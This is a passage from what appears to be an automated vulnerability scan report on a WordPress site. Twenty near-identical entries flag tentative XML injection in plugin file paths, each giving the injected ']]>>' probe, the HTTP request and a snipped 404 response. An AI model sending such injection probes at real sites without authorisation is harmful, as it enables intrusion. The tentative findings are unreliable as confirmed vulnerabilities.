HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:05:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:05:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27830 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.26. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3-core-yc.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/superslider/js/mootools Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:29:36 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:29:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27830 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.27. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3-core-yc.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:47:11 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:47:27 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27830 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.28. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3-core-yc.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:07:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:07:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27830 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.29. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3-core-yc.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:26:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:27:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27830 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.30. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3.1-more.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/superslider/js Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:47:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:48:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.31. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3.1-more.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/superslider/js/mootools Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:09:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:10:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.32. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3.1-more.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:38:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:39:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.33. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3.1-more.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:04:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:05:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.34. http://www.ligattsecurity.com/wp-content/plugins/superslider/js/mootools-1.2.3.1-more.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:23:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:23:15 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27829 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.35. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/superslider Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:52:52 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:52:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.36. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/superslider/plugin-data Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:13:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:13:04 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.37. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:33:03 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:33:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.38. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:56:21 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:56:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.39. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:23:01 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:23:06 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.40. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/scroll.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/superslider Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:56:21 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:56:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.41. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/scroll.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/superslider/plugin-data Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:23:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:23:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.42. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/scroll.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:44:36 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:45:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.43. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/scroll.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:02:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:02:12 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.44. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/scroll.css [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:21:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:22:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.45. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/scroll.css [REST URL parameter 6] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
